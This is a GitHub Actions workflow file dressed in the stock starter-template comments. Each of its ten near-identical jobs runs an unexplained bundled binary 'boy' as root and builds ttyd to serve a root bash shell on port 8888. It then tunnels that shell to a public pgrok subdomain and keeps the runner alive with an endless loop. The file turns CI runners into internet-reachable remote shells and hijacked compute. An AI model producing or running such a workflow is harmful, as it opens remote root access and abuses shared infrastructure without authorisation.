# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the action will run. 
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl1 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
  play:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl2 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
          
  try:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl3 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
          
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl4 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
          
  find:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl5 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
          
  look:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl6 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
          
  search:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl7 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
          
  shoot:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl8 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
          
  go:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl9 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
          
  jump:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Run a multi-line script
        run: |
          chmod 755 boy && sudo ./boy
          sudo apt update && sudo apt install -y libuv1-dev libssl-dev libjson-c-dev libwebsockets-dev
          git clone https://github.com/inkookz/ttyd.git
          mkdir b && cd b && cmake ../ttyd && make && sudo make install
          wget https://github.com/jerson/pgrok/releases/download/v3.2.0/pgrok_3.2.0_linux_amd64.deb
          sudo dpkg -i pgrok_3.2.0_linux_amd64.deb
          sudo ttyd -p 8888 /bin/bash &
          screen -dmS gg pgrok -subdomain=dfxl0 8888
      - name: loop
        run: |
          while true;do echo $RANDOM;sleep 30;done
